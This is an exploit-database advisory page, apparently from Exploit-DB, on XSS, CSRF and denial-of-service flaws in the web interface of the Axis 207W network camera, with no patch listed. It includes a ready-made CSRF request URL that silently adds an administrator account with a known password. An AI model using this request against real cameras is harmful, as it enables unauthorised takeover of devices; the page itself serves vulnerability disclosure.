header-logo
Suggest Exploit
vendor:
207W Network Camera
by:
7.5
CVSS
HIGH
Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Denial-of-Service (DoS)
79, 352, 400
CWE
Product Name: 207W Network Camera
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Axis Communications 207W Network Camera Web Interface Multiple Vulnerabilities

The Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability. Exploiting these issues may allow an attacker to compromise the device or to prevent other users from using the device.

Mitigation:

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25678/info
 
Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability.
 
Exploiting these issues may allow an attacker to compromise the device or to prevent other users from using the device.
 
Add a new administrator -
http://www.example.com/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.sh
+tml%3Fpageclose%3D1

Navigation

Suggest Exploit

Services By CQR